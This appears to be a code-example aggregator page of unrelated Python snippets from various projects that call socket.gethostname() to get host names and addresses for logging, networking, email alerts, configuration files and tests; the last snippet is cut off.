Exemple #1
0
 def getHostLocalAddress(self,):
     
     if platform == "darwin":
         hostname = socket.gethostname() if '.local' in socket.gethostname() else socket.gethostname()+'.local' #OS X where hostname doesn't have the <.local>
         return socket.gethostbyname(hostname)
     else:
         return socket.gethostbyname(socket.gethostname())
Exemple #2
0
def _doemail(request):
  cgiParams = request.GET
  assert 'recipients' in cgiParams and 'url' in cgiParams and 'title' in cgiParams, "Incomplete doemail, requires recipients, url, and title"
  import smtplib, httplib, urlparse
  from email.MIMEMultipart import MIMEMultipart
  from email.MIMEText import MIMEText
  from email.MIMEImage import MIMEImage
  url = cgiParams['url']
  title = cgiParams['title']
  recipients = cgiParams['recipients'].split(',')
  proto, server, path, query, frag = urlparse.urlsplit(url)
  if query: path += '?' + query
  conn = httplib.HTTPConnection(server)
  conn.request('GET',path)
  resp = conn.getresponse()
  assert resp.status == 200, "Failed HTTP response %s %s" % (resp.status, resp.reason)
  rawData = resp.read()
  conn.close()
  message = MIMEMultipart()
  message['Subject'] = "Graphite Image"
  message['To'] = ', '.join(recipients)
  message['From'] = 'frontend@%s' % socket.gethostname()
  text = MIMEText( "Image generated by the following graphite URL at %s\r\n\r\n%s" % (time.ctime(),url) )
  image = MIMEImage( rawData )
  image.add_header('Content-Disposition', 'attachment', filename=title + time.strftime("_%b%d_%I%M%p.png"))
  message.attach(text)
  message.attach(image)
  server = smtplib.SMTP(settings.SMTP_SERVER)
  server.sendmail('frontend@%s' % socket.gethostname(),recipients,message.as_string())
  server.quit()
  return stdout("Successfully sent %s to %s" % (url,cgiParams['recipients']))
def sentimentAnalysis(tweet_dict):
    analysis = {}

    logger.info(socket.gethostname() + " Start sentiment analysis " + view_name + ".")
    start_sentiment_time = time.time()
    for item in tweet_dict:
        try:
            (key, text) = item.split("@@##$$")
            testimonial = TextBlob(text)
            polarity = float(testimonial.sentiment[0])
        except:
            logger.info(socket.gethostname() + " cannot analysis word " + text + ".")
            continue

        if polarity > 0.0:
            try:
                analysis[key + "###positive"] += 1
            except:
                analysis[key + "###positive"] = 1
        elif polarity == 0.0:
            try:
                analysis[key + "###neutral"] += 1
            except:
                analysis[key + "###neutral"] = 1
        else:
            try:
                analysis[key + "###negative"] += 1
            except:
                analysis[key + "###negative"] = 1
    end_sentiment_time = time.time()
    sentiment_time = end_sentiment_time - start_sentiment_time
    logger.info(socket.gethostname() + " Finished sentiment analysis for " + str(sentiment_time) + "s.")
    for (item, count) in analysis.iteritems():
        print item, "######", count
Exemple #4
0
def _machine_id():
    """
    for informational purposes, try to get a machine unique id thing
    """
    if platform.isLinux():
        try:
            # why this? see: http://0pointer.de/blog/projects/ids.html
            with open('/var/lib/dbus/machine-id', 'r') as f:
                return f.read().strip()
        except:
            # Non-dbus using Linux, get a hostname
            return socket.gethostname()

    elif platform.isMacOSX():
        # Get the serial number of the platform
        import plistlib
        plist_data = subprocess.check_output(["ioreg", "-rd1", "-c", "IOPlatformExpertDevice", "-a"])

        if six.PY2:
            # Only API on 2.7
            return plistlib.readPlistFromString(plist_data)[0]["IOPlatformSerialNumber"]
        else:
            # New, non-deprecated 3.4+ API
            return plistlib.loads(plist_data)[0]["IOPlatformSerialNumber"]

    else:
        # Something else, just get a hostname
        return socket.gethostname()
    def __init__(self, data_set_name, fixed_tags=None, variable_tags=None, data=None):
        self.data_set_name = str(data_set_name)

        # fixed_tags can optionally be provided in a dict upong DS declaration
        if fixed_tags==None:
            self.fixed_tags={'host':gethostname()}
        elif type(fixed_tags) is dict:
            self.fixed_tags = fixed_tags
            self.fixed_tags['host']=gethostname()
        else:
            print "ERROR: if passing fixed_tags, type must be a dict!"
            exit(1)

        # variable_tags can optionally be provided in a dict upong DS declaration
        if variable_tags==None:
            self.variable_tags = []
            if data != None: self.variable_tags.append({})
        elif type(variable_tags) is dict:
            self.variable_tags = [variable_tags]
        else:
            print "ERROR: if passing variable_tags, type must be a dict!"
            exit(1)

        # data can optionally be provided in a dict upon DS declaration
        if data==None:
            self.data = []
            if variable_tags != None: self.data.append({})
        elif type(data) is dict:
            self.data = [data]
        else:
            print "ERROR: if passing data, type must be a dict!"
            exit(1)
Exemple #6
0
def set_ip_dhcp():
    print "SET IP ADRESS  : DHCP"
    logging.info( "SET IP ADRESS  : DHCP")
    host_ip=socket.gethostbyname(socket.gethostname())
    get_ip=host_ip
    os.system('netsh interface ipv4 set address name="Ethernet" source=dhcp')
    i=0        
    while get_ip == host_ip :
        ip_t=socket.gethostbyname(socket.gethostname())
        if ip_t!='127.0.0.1':
            get_ip=ip_t
        if i==0:
            sys.stdout.write("Processing ") 
        else:
            sys.stdout.write(".")
        time.sleep(1)
        if i < 60: 
            i = i + 1
        else:
            print "WAIT ",i," SEC, STOPPED, IP ADDRESS :",get_ip
            logging.error( "WAIT "+i+" SEC, STOPPED, IP ADDRESS :",get_ip)
            break
    print ""   
    print "OK, IP ADRESS HOST FROM DHCP :",get_ip
    logging.info("OK, IP ADRESS HOST FROM DHCP :"+get_ip)
def rebuild(tokudb, builddir, tokudb_data, cc, cxx, tests):
    info('Building tokudb.')
    if not os.path.exists(builddir):
        os.mkdir(builddir)
    newenv = os.environ
    newenv['CC'] = cc
    newenv['CXX'] = cxx
    r = call(['cmake',
              '-DCMAKE_BUILD_TYPE=Debug',
              '-DUSE_GTAGS=OFF',
              '-DUSE_CTAGS=OFF',
              '-DUSE_ETAGS=OFF',
              '-DUSE_CSCOPE=OFF',
              '-DTOKUDB_DATA=%s' % tokudb_data,
              tokudb],
             env=newenv,
             cwd=builddir)
    if r != 0:
        send_mail(['*****@*****.**'], 'Stress tests on %s failed to build.' % gethostname(), '')
        error('Building the tests failed.')
        sys.exit(r)
    r = call(['make', '-j8'], cwd=builddir)
    if r != 0:
        send_mail(['*****@*****.**'], 'Stress tests on %s failed to build.' % gethostname(), '')
        error('Building the tests failed.')
        sys.exit(r)
Exemple #8
0
def _load_ips_gethostbyname():
    """load ip addresses with socket.gethostbyname_ex

    This can be slow.
    """
    global LOCALHOST
    try:
        LOCAL_IPS[:] = socket.gethostbyname_ex('localhost')[2]
    except socket.error:
        # assume common default
        LOCAL_IPS[:] = ['127.0.0.1']

    try:
        hostname = socket.gethostname()
        PUBLIC_IPS[:] = socket.gethostbyname_ex(hostname)[2]
        # try hostname.local, in case hostname has been short-circuited to
        # loopback
        if not hostname.endswith('.local') and all(ip.startswith('127') for ip in PUBLIC_IPS):
            PUBLIC_IPS[:] = socket.gethostbyname_ex(
                socket.gethostname() + '.local')[2]
    except socket.error:
        pass
    finally:
        PUBLIC_IPS[:] = uniq_stable(PUBLIC_IPS)
        LOCAL_IPS.extend(PUBLIC_IPS)

    # include all-interface aliases: 0.0.0.0 and ''
    LOCAL_IPS.extend(['0.0.0.0', ''])

    LOCAL_IPS[:] = uniq_stable(LOCAL_IPS)

    LOCALHOST = LOCAL_IPS[0]
Exemple #9
0
def set_ip(host_ip):
    print ""
    print ""
    sys.stdout.write("SET IP STATIC ADRESS  :"+host_ip[0]+"     ")
    logging.info( "SET IP ADRESS  :"+host_ip[0])
    get_ip=socket.gethostbyname(socket.gethostname())
    if get_ip!=host_ip[0]:
        os.system('netsh interface ipv4 set address name="Ethernet" source=static address='+host_ip[0]+' mask='+host_ip[1]+' gateway='+host_ip[2])
        i=0        
        while get_ip != host_ip[0] :
            ip_t=socket.gethostbyname(socket.gethostname())
            if ip_t!='127.0.0.1':
                get_ip=ip_t
            
            if i==0:
                sys.stdout.write("Processing ") 
            else:
                sys.stdout.write(".")
            time.sleep(1)
            if i < 60: 
                i = i + 1
            else:
                sys.stdout.write( "    WAIT "+str(i)+" SEC STOPPED, IP ADDRESS :"+get_ip)
                break      
        sys.stdout.write("OK, SET STATIC IP ADRESS HOST :"+get_ip)
        logging.info("OK, SET STATIC IP ADRESS HOST :"+get_ip)
    else:
        sys.stdout.write("IP :"+str(host_ip)+" established")
        logging.error("IP :"+str(host_ip)+" established")
    def __init__(self, rule_file, discovery_server,
                 discovery_port, collector_addr):
        self.module = Module.COMPUTE_NODE_MGR
        self.module_id = ModuleNames[self.module]

        node_type = Module2NodeType[self.module]
        node_type_name = NodeTypeNames[node_type]
        self.sandesh_global = sandesh_global
        EventManager.__init__(self, rule_file, discovery_server,
                              discovery_port, collector_addr, sandesh_global)
        self.node_type = "contrail-vrouter"
        self.table = "ObjectVRouter"
        _disc = self.get_discovery_client()
        sandesh_global.init_generator(
            self.module_id, socket.gethostname(),
            node_type_name, self.instance_id, self.collector_addr,
            self.module_id, 8102, ['vrouter.loadbalancer',
                'nodemgr.common.sandesh'], _disc)
        sandesh_global.set_logging_params(enable_local_log=True)
        self.supervisor_serverurl = "unix:///var/run/supervisord_vrouter.sock"
        self.add_current_process()
        ConnectionState.init(sandesh_global, socket.gethostname(), self.module_id,
            self.instance_id,
            staticmethod(ConnectionState.get_process_state_cb),
            NodeStatusUVE, NodeStatus, self.table)

        self.lb_stats = LoadbalancerStatsUVE()
        self.send_system_cpu_info()
        self.third_party_process_dict = {}
Exemple #11
0
    def no_test_userandaddressinit(self):
        server = 'http://demo.opencastproject.org'
        user = '******';
        password = '******';
        hostname = 'rubenruaHost'
        address = '8.8.8.8'
        workflow = 'mini-full'
        workflow_parameters = 'uno:uno'
        workflow_parameters_2 = 'uno:uno;dos:dos'

        client = MHHTTPClient(server, user, password)
        self.assertEqual(client.hostname, 'GC-' + socket.gethostname())
        self.assertEqual(client.address, socket.gethostbyname(socket.gethostname()))

        client = MHHTTPClient(server, user, password, hostname)
        self.assertEqual(client.hostname, hostname)
        self.assertEqual(client.address, socket.gethostbyname(socket.gethostname()))

        client = MHHTTPClient(server, user, password, hostname, address)
        self.assertEqual(client.hostname, hostname)
        self.assertEqual(client.address, address)

        client = MHHTTPClient(server, user, password, hostname, address)
        self.assertEqual(client.workflow, 'full')
        self.assertEqual(client.workflow_parameters, {'trimHold': 'true'})

        client = MHHTTPClient(server, user, password, hostname, address, workflow, workflow_parameters)
        self.assertEqual(client.workflow, 'mini-full')
        self.assertEqual(client.workflow_parameters, {'uno': 'uno'})

        client = MHHTTPClient(server, user, password, hostname, address, workflow, workflow_parameters_2)
        self.assertEqual(client.workflow, 'mini-full')
        self.assertEqual(client.workflow_parameters, {'uno': 'uno', 'dos': 'dos'})
def get_node_name():
    # Get all the nodes in the cluster
    cmd = 'kubectl --kubeconfig={} get no -o=json'.format(kubeconfig_path)
    cmd = cmd.split()
    deadline = time.time() + 60
    while time.time() < deadline:
        try:
            raw = check_output(cmd)
            break
        except CalledProcessError:
            hookenv.log('Failed to get node name for node %s.'
                        ' Will retry.' % (gethostname()))
            time.sleep(1)
    else:
        msg = 'Failed to get node name for node %s' % gethostname()
        raise GetNodeNameFailed(msg)

    result = json.loads(raw.decode('utf-8'))
    if 'items' in result:
        for node in result['items']:
            if 'status' not in node:
                continue
            if 'addresses' not in node['status']:
                continue

            # find the hostname
            for address in node['status']['addresses']:
                if address['type'] == 'Hostname':
                    if address['address'] == gethostname():
                        return node['metadata']['name']

                    # if we didn't match, just bail to the next node
                    break
    msg = 'Failed to get node name for node %s' % gethostname()
    raise GetNodeNameFailed(msg)
Exemple #13
0
def create_uid_email(username=None, hostname=None):
    """Create an email address suitable for a UID on a GnuPG key.

    :param str username: The username portion of an email address.  If None,
                         defaults to the username of the running Python
                         process.

    :param str hostname: The FQDN portion of an email address. If None, the
                         hostname is obtained from gethostname(2).

    :rtype: str
    :returns: A string formatted as <username>@<hostname>.
    """
    if hostname:
        hostname = hostname.replace(' ', '_')
    if not username:
        try: username = os.environ['LOGNAME']
        except KeyError: username = os.environ['USERNAME']

        if not hostname: hostname = gethostname()

        uid = "%s@%s" % (username.replace(' ', '_'), hostname)
    else:
        username = username.replace(' ', '_')
        if (not hostname) and (username.find('@') == 0):
            uid = "%s@%s" % (username, gethostname())
        elif hostname:
            uid = "%s@%s" % (username, hostname)
        else:
            uid = username

    return uid
    def on_message(self, headers, body):
        # FIXME, don't hardcode keepalive topic name:
        if headers["destination"] == "/topic/keepalive":
            logging.debug("got keepalive message")
            response = {
                "host": socket.gethostname(),
                "script": os.path.basename(__file__),
                "timestamp": datetime.now().isoformat(),
            }
            stomp.send(body=json.dumps(response), destination="/topic/keepalive_response")

            return ()

        debug_msg = {
            "script": os.path.basename(__file__),
            "host": socket.gethostname(),
            "timestamp": datetime.now().isoformat(),
            "message": "received message from %s, before thread" % headers["destination"],
        }
        stomp.send(body=json.dumps(debug_msg), destination="/topic/keepalive_response")

        logging.info("Received stomp message: {message}".format(message=body))
        received_obj = None
        try:
            received_obj = json.loads(body)
        except ValueError as e:
            logging.error("Received invalid JSON: %s." % body)
            return

        handle_builder_event(received_obj)
        logging.info("Destination: %s" % headers.get("destination"))

        # Acknowledge that the message has been processed
        self.message_received = True
def links(*screen):
    synergyconf = open(os.path.join(os.path.expanduser("~"), ".synergy.conf"), 'a')
    synergyconf.write('section: links\n')
    for y in screen[0]:
        if y is not None: ## If the comboBox is not empty
            subnames.append(y.split('_'))
        else:
            pass
    ### writing the host part ####
    synergyconf.write("\t%s:\n" % gethostname())
    for z in subnames:
            if z[0] == 'host':
                pass
            else:
                synergyconf.write("\t%s = %s\n" % (z[0], z[2]))

    ### writing the client part ###
    for clients in subnames:
        if clients[2] == gethostname():
            pass
        else:
            synergyconf.write("\t%s:\n" % clients[2])
            synergyconf.write("\t\t%s = %s\n" % (clients[1], gethostname()))

    synergyconf.write('end\n')
    synergyconf.close()
def restartAndSendEmailAlert(restart, subject, msg, alertops = False):
	if restart:
		restart_msg = commands.getoutput("/etc/init.d/smartproxyd restart")
		# append restart msg:
		msg += "\n\nRestarting smartproxyd: %s\n\n" % restart_msg

	sender = 'root@%s' % socket.gethostname()
	receivers = EMAIL_NOTIFICATION_LIST
	# add ops to the receivers if necessary:
	if alertops:
		receivers.append(OPS_NOTIFICATION)

	server= smtplib.SMTP('localhost')

	# if we restarted, wait for a few seconds before appending the log, so that smartproxyd has time to start:
	if restart:
		time.sleep(5)

	# append the last 30 lines of the smartproxyd.log to the msg:
	log = commands.getoutput("tail -n 30 /var/log/lounge/smartproxyd.log")
	msg += "\n\nsmartproxyd.log (last 30 lines):\n" + log
	
	server.sendmail(sender, receivers,
                    ('From: %s\n'
                     + 'To: %s\n'
                     + 'Subject: %s: %s\n\n'
                     +  '%s') % (sender, COMMASPACE.join(receivers), socket.gethostname(), subject, msg))
	server.quit()
Exemple #17
0
def get_ip():
    """Provides an available network interface address, for example
       "192.168.1.3".

       A `NetworkError` exception is raised in case of failure."""
    try:
        try:
            ip = socket.gethostbyname(socket.gethostname())
        except socket.gaierror:  # for Mac OS X
            ip = socket.gethostbyname(socket.gethostname() + ".local")
    except socket.gaierror:
        # sometimes the hostname doesn't resolve to an ip address, in which
        # case this will always fail
        ip = None

    if (ip is None or ip.startswith("127.")) and mozinfo.isLinux:
        interfaces = _get_interface_list()
        for ifconfig in interfaces:
            if ifconfig[0] == 'lo':
                continue
            else:
                return ifconfig[1]

    if ip is None:
        raise NetworkError('Unable to obtain network address')

    return ip
	def handle_line(self, configFileName, fileName, line):
		"""docstring for handle_line""" 
		#print "==> %s <==" % fileName
		#print line,
		if self.isalertmatch(line):
			eventType = 'ALERT'
			severity = 'RED'
		elif self.isclearmatch(line):
			eventType = 'CLEAR'
			severity = 'WHITE'
		else:
			return

		if self.escalationType == "Email":
			e = Email("halavin@localhost", "Alert Email", configFileName + "::" + fileName + "::" + line)
			e.sendemail()
			e = None
		elif self.escalationType == "SnmpTrap":
			st = SnmpTrap()
			st.sendTrap(socket.gethostname(), 
					socket.gethostname(),
					eventType,
					severity,
					configFileName+"::"+fileName,
					configFileName+"::"+fileName+"::"+line 
				)
		elif self.escalationType == "Log":
			pass
		else:
			# else just print it on the screen
			print "%s::%s::%s:%s" % ("ALERT", configFileName, fileName, line),
Exemple #19
0
def send_email(request):
  try:
    recipients = request.GET['to'].split(',')
    url = request.GET['url']
    proto, server, path, query, frag = urlsplit(url)
    if query: path += '?' + query
    conn = HTTPConnection(server)
    conn.request('GET',path)
    resp = conn.getresponse()
    assert resp.status == 200, "Failed HTTP response %s %s" % (resp.status, resp.reason)
    rawData = resp.read()
    conn.close()
    message = MIMEMultipart()
    message['Subject'] = "Graphite Image"
    message['To'] = ', '.join(recipients)
    message['From'] = 'composer@%s' % gethostname()
    text = MIMEText( "Image generated by the following graphite URL at %s\r\n\r\n%s" % (ctime(),url) )
    image = MIMEImage( rawData )
    image.add_header('Content-Disposition', 'attachment', filename="composer_" + strftime("%b%d_%I%M%p.png"))
    message.attach(text)
    message.attach(image)
    s = SMTP(settings.SMTP_SERVER)
    s.sendmail('composer@%s' % gethostname(),recipients,message.as_string())
    s.quit()
    return HttpResponse( "OK" )
  except:
    return HttpResponse( format_exc() )
Exemple #20
0
    def is_local(self, hosts):
        if 0 == len(self.local_names):
            self.local_names.append('localhost')
            self.local_names.append(socket.gethostname().lower());
            try:
                self.local_names.append(socket.gethostbyname_ex(socket.gethostname())[-1])
            except socket.gaierror:
                # TODO Append local IP address to local_names
                pass

        for s in hosts:
            s = s.lower()
            if s.startswith('127.') \
                    or s.startswith('192.168.') \
                    or s.startswith('10.') \
                    or s.startswith('169.254.') \
                    or s in self.local_names:
                print s
                return True

            for h in config.PROXY_HOSTS_ONLY:
                # if PROXY_HOSTS_ONLY is not empty
                # only proxy these hosts
                if s.endswith(h):
                    return False

        if len(config.PROXY_HOSTS_ONLY) > 0:
            return True
        else:
            return False
def dump_bug (level, etype, msg, location=None, nhdf=None):
    global DISABLE_DUMP
    if DISABLE_DUMP: return

    now = int(time.time())
    pid = os.getpid()

    import neo_cgi, neo_util
    hdf = neo_util.HDF()
    hdf.setValue("Required.Level", level)
    hdf.setValue("Required.When", str(int(time.time())))
    hdf.setValue("Required.Type", etype)
    hdf.setValue("Required.Title", msg)
    hdf.setValue("Optional.Hostname", socket.gethostname())
    if location:
        hdf.setValue("Optional.Location", location)

    for (key, value) in os.environ.items():
        hdf.setValue ("Environ.%s" % key, value)

    global Count
    Count = Count + 1
    fname = "%d.%d_%d.%s" % (now, pid, Count, socket.gethostname())
    checkPaths()

    tpath = os.path.join (DUMP_DIR, "tmp", fname)
    npath = os.path.join (DUMP_DIR, "new", fname)
    hdf.writeFile(tpath)
    os.rename(tpath, npath)
    def api_publish(self, end_point = None):
        self._debug['msg_pubs'] += 1
        ctype = bottle.request.headers['content-type']
        json_req = {}
        if ctype == 'application/json':
            data = bottle.request.json
            for service_type, info in data.items():
                json_req['name'] = service_type
                json_req['info'] = info
        elif ctype == 'application/xml':
            data = xmltodict.parse(bottle.request.body.read())
            for service_type, info in data.items():
                json_req['name'] = service_type
                json_req['info'] = dict(info)
        else:
            bottle.abort(400, e)

        sig = end_point or publisher_id(
                bottle.request.environ['REMOTE_ADDR'], json.dumps(json_req))

        # Rx {'name': u'ifmap-server', 'info': {u'ip_addr': u'10.84.7.1',
        # u'port': u'8443'}}
        info = json_req['info']
        service_type = json_req['name']

        entry = self._db_conn.lookup_service(service_type, service_id=sig)
        if not entry:
            entry = {
                'service_type': service_type,
                'service_id': sig,
                'in_use': 0,
                'ts_use': 0,
                'ts_created': int(time.time()),
                'prov_state': 'new',
                'remote': bottle.request.environ.get('REMOTE_ADDR'),
                'sequence': str(int(time.time())) + socket.gethostname(),
            }
        elif 'sequence' not in entry or self.service_expired(entry):
            # handle upgrade or republish after expiry
            entry['sequence'] = str(int(time.time())) + socket.gethostname()

        entry['info'] = info
        entry['admin_state'] = 'up'
        entry['heartbeat'] = int(time.time())

        # insert entry if new or timed out
        self._db_conn.update_service(service_type, sig, entry)

        response = {'cookie': sig + ':' + service_type}
        if ctype != 'application/json':
            response = xmltodict.unparse({'response': response})

        self.syslog('publish service "%s", sid=%s, info=%s'
                    % (service_type, sig, info))

        if not service_type.lower() in self.service_config:
            self.service_config[
                service_type.lower()] = self._args.default_service_opts

        return response
Exemple #23
0
	def sendCommunicationAlertClear(self):

		if not self.communicationAlertSent:
			return True

		subject = "[alertR] (%s) Communication problems solved" \
			% socket.gethostname()

		message = "The communication problems between the host '%s' " \
			% socket.gethostname() \
			+ "and the server were solved."

		emailHeader = "From: %s\r\nTo: %s\r\nSubject: %s\r\n" \
			% (self.fromAddr, self.toAddr, subject)

		# sending eMail alert to configured smtp server
		logging.info("[%s]: Sending eMail alert to %s." 
			% (self.fileName, self.toAddr))
		try:
			smtpServer = smtplib.SMTP(self.host, self.port)
			smtpServer.sendmail(self.fromAddr, self.toAddr, 
				emailHeader + message)
			smtpServer.quit()
		except Exception as e:
			logging.exception("[%s]: Unable to send eMail alert. " 
				% self.fileName)
			return False

		# clear flag that a communication alert was sent before exiting
		self.communicationAlertSent = False

		return True
	def __init__(self, debug=False):
		self.debug  = debug
		if self.debug:
			logLevel = logging.DEBUG
		else:
			logLevel = logging.INFO
		logging.basicConfig(format='%(levelname)s: %(message)s', level=logLevel)

		if not os.path.isdir(self.OUTPUT_DIR):
		 	os.mkdir(self.OUTPUT_DIR)
		if not os.path.isdir(self.UNPROCESSED_DIR):
		 	os.mkdir(self.UNPROCESSED_DIR)
		if not os.path.isdir(self.PROCESSED_DIR):
		 	os.mkdir(self.PROCESSED_DIR)
		if not os.path.isdir(self.PROCESSING_DIR):
		 	os.mkdir(self.PROCESSING_DIR)
		self.db = DB(debug = self.debug)
		self.rsync = rsync( self.debug )

		if socket.gethostname() == 'cet-sif':
			self.OnServer = True
			# self.host = socket.gethostbyname( 'cet-research.colorado.edu' )
			self.host = '128.138.248.205'
		else:
			self.OnServer = False
			self.host = socket.gethostbyname(socket.gethostname())
Exemple #25
0
	def sendCommunicationAlert(self, connectionRetries):

		if self.communicationAlertSent:
			return True

		subject = "[alertR] (%s) Communication problems detected" \
			% socket.gethostname()

		message = "Communication problems detected between the host '%s' " \
			% socket.gethostname() \
			+ "and the server. The host '%s' was not able to establish " \
			% socket.gethostname() \
			+ "a connection after %d retries." \
			% connectionRetries

		emailHeader = "From: %s\r\nTo: %s\r\nSubject: %s\r\n" \
			% (self.fromAddr, self.toAddr, subject)

		# sending eMail alert to configured smtp server
		logging.info("[%s]: Sending eMail alert to %s." 
			% (self.fileName, self.toAddr))
		try:
			smtpServer = smtplib.SMTP(self.host, self.port)
			smtpServer.sendmail(self.fromAddr, self.toAddr, 
				emailHeader + message)
			smtpServer.quit()
		except Exception as e:
			logging.exception("[%s]: Unable to send eMail alert. " 
				% self.fileName)
			return False

		# set flag that a communication alert was sent before exiting
		self.communicationAlertSent = True

		return True
Exemple #26
0
 def test_bulkadd(self):
   app_id = 'test_app'
   bulk_add_request = taskqueue_service_pb.TaskQueueBulkAddRequest()
   item = bulk_add_request.add_add_request()
   item.set_app_id(app_id)
   item.set_queue_name('default') 
   item.set_task_name('babaganoose')
   item.set_eta_usec(0)
   item.set_method(taskqueue_service_pb.TaskQueueAddRequest.GET)
   item.set_mode(taskqueue_service_pb.TaskQueueMode.PUSH)
   host = socket.gethostbyname(socket.gethostname())
   item.set_url('http://' + host + ':64839/queues') 
   host = socket.gethostbyname(socket.gethostname())
   req = urllib2.Request('http://' + host + ':64839')
   api_request = remote_api_pb.Request()
   api_request.set_method("BulkAdd")
   api_request.set_service_name("taskqueue")
   api_request.set_request(bulk_add_request.Encode())
   remote_request = api_request.Encode()
   req.add_header('Content-Length', str(len(remote_request)))
   req.add_header('protocolbuffertype', 'Request') 
   req.add_header('appdata', app_id) 
   response = urllib2.urlopen(req, remote_request)
   api_response = response.read()
   api_response = remote_api_pb.Response(api_response) 
   bulk_add_response = taskqueue_service_pb.TaskQueueBulkAddResponse(api_response.response())
   print bulk_add_response
   self.assertEquals(response.getcode(), 200)
 def test_bulkadd(self):
     app_id = "test_app"
     bulk_add_request = taskqueue_service_pb.TaskQueueBulkAddRequest()
     item = bulk_add_request.add_add_request()
     item.set_app_id(app_id)
     item.set_queue_name("default")
     item.set_task_name("babaganoose")
     item.set_method(taskqueue_service_pb.TaskQueueAddRequest.GET)
     item.set_mode(taskqueue_service_pb.TaskQueueMode.PUSH)
     item.set_eta_usec(5000000)  # 5 seconds
     host = socket.gethostbyname(socket.gethostname())
     item.set_url("http://" + host + ":64839/queues")
     host = socket.gethostbyname(socket.gethostname())
     req = urllib2.Request("http://" + host + ":64839")
     api_request = remote_api_pb.Request()
     api_request.set_method("BulkAdd")
     api_request.set_service_name("taskqueue")
     api_request.set_request(bulk_add_request.Encode())
     remote_request = api_request.Encode()
     req.add_header("Content-Length", str(len(remote_request)))
     req.add_header("protocolbuffertype", "Request")
     req.add_header("appdata", app_id)
     response = urllib2.urlopen(req, remote_request)
     api_response = response.read()
     api_response = remote_api_pb.Response(api_response)
     bulk_add_response = taskqueue_service_pb.TaskQueueBulkAddResponse(api_response.response())
     print bulk_add_response
     self.assertEquals(response.getcode(), 200)
def main():
    components = []

    processes, license = read_config()
    pids = find_pid(processes)

    LOG.info("Watching process:" )

    for pid in pids:
        collection = []
        metrics = dict()
        process = psutil.Process(pid.pid)
    
        collection.append(get_cpu_stats(process))
        collection.append(get_net_stats(process))
        collection.append(get_vm_stats(process))
        collection.append(get_io_stats(process))
    
        for metric in collection:
            for data in metric.metrics:
                namespace = ''
                unit = ''
                section = metric.t_class
                name = data.name
    
                if data.namespace:
                    namespace = data.namespace + "/"
    
                if data.unit:
                    unit = "[" + data.unit + "]"
    
                key = "Component/%(section)s/%(namespace)s%(name)s%(unit)s" % locals()
                value = data.metric
                metrics[key] = value

        component_template = {
            "name": "%s-%s-%s" % (str(pid.pid), pid.name(), gethostname()),
            "guid": GUID,
            "duration" : 60,
            "metrics" : metrics       
        }

        components.append(component_template)
    
    
    payload = {
      "agent": {
        "host" : gethostname(),
        "pid" : getpid(),
        "version" : "1.0.0"
      },
      "components": components
    }
    
    LOG.debug("Sending payload\n: %s", payload)
    
    headers = {"X-License-Key": license, "Content-Type":"application/json", "Accept":"application/json"}
    request = requests.post(url=URL, headers=headers, data=json.dumps(payload))
    LOG.debug("Newrelic response code: %s" ,request.status_code)
    print request.text
Exemple #29
0
    def network_details():
        """
        Returns details about the network links
        """
        # Get IPv4 details
        ipv4_addresses = [info[4][0] for info in socket.getaddrinfo(
            socket.gethostname(), None, socket.AF_INET)]

        # Add localhost
        ipv4_addresses.extend(info[4][0] for info in socket.getaddrinfo(
            "localhost", None, socket.AF_INET))

        # Filter addresses
        ipv4_addresses = sorted(set(ipv4_addresses))

        try:
            # Get IPv6 details
            ipv6_addresses = [info[4][0] for info in socket.getaddrinfo(
                socket.gethostname(), None, socket.AF_INET6)]

            # Add localhost
            ipv6_addresses.extend(info[4][0] for info in socket.getaddrinfo(
                "localhost", None, socket.AF_INET6))

            # Filter addresses
            ipv6_addresses = sorted(set(ipv6_addresses))
        except (socket.gaierror, AttributeError):
            # AttributeError: AF_INET6 is missing in some versions of Python
            ipv6_addresses = None

        return {"IPv4": ipv4_addresses, "IPv6": ipv6_addresses,
                "host.name": socket.gethostname(),
                "host.fqdn": socket.getfqdn()}
Exemple #30
0
    def test_check_for_setup_error(self, vgs):
        vg_obj = fake_lvm.FakeBrickLVM('cinder-volumes',
                                       False,
                                       None,
                                       'default')

        configuration = conf.Configuration(fake_opt, 'fake_group')
        lvm_driver = lvm.LVMVolumeDriver(configuration=configuration,
                                         vg_obj=vg_obj, db=db)

        lvm_driver.delete_snapshot = mock.Mock()

        volume = tests_utils.create_volume(self.context,
                                           host=socket.gethostname())
        volume_id = volume['id']

        backup = {}
        backup['volume_id'] = volume_id
        backup['user_id'] = fake.USER_ID
        backup['project_id'] = fake.PROJECT_ID
        backup['host'] = socket.gethostname()
        backup['availability_zone'] = '1'
        backup['display_name'] = 'test_check_for_setup_error'
        backup['display_description'] = 'test_check_for_setup_error'
        backup['container'] = 'fake'
        backup['status'] = fields.BackupStatus.CREATING
        backup['fail_reason'] = ''
        backup['service'] = 'fake'
        backup['parent_id'] = None
        backup['size'] = 5 * 1024 * 1024
        backup['object_count'] = 22
        db.backup_create(self.context, backup)

        lvm_driver.check_for_setup_error()
        Examples
        --------
        >>> value = client.get_dio()
        """
        return self.dio.read().data[0]

    def set_dio(self, value):
        """
        a wrapper to get digital state from the device handler process

        Parameters
        ----------
        value :: integer

        Returns
        -------

        Examples
        --------
        >>> client.set_dio(127)
        """
        result = self.dio.write(value)

if __name__ == '__main__':
    import socket
    SERVER_NAME = socket.gethostname()

    from icarus_nmr.device_client import Client
    client = Client(device_ca_server_prefix = f'device_{SERVER_NAME}:')
    self = client
Exemple #32
0
import os;
import socket;
import _thread;
import json;
import argparse;
import time;
import wx;

parser = argparse.ArgumentParser(prog="client", conflict_handler = "resolve");
host = socket.gethostname();
parser.add_argument("--host", "-h", type = str, default = host, help = "host name (default: socket.gethostname())");
parser.add_argument("--port", "-p", type = int, default = 8080, help = "port number (default: 8080)");
parser.add_argument("--buffer-size", "-b", type = int, default = 1024, help = "buffer size of the receiver (default: 1024)");
parser.add_argument("--path", "-t", type = str, default = "./data/", help = "path of the download directory (default: ./data/)");
args = parser.parse_args();

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM);
host = args.host;
port = args.port;
buffer_size = args.buffer_size;
path = args.path;

class client_app(wx.App):

	#overload the initializer
	def OnInit(self):
		sock.connect((host, port));
		print("connect to", (host, port));
		self.init_frame();
		return True;
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible.  If not, see <http://www.gnu.org/licenses/>.

import json
import socket
import sys

own_ip = socket.gethostbyname(socket.gethostname())

config = {
    "pebble": {
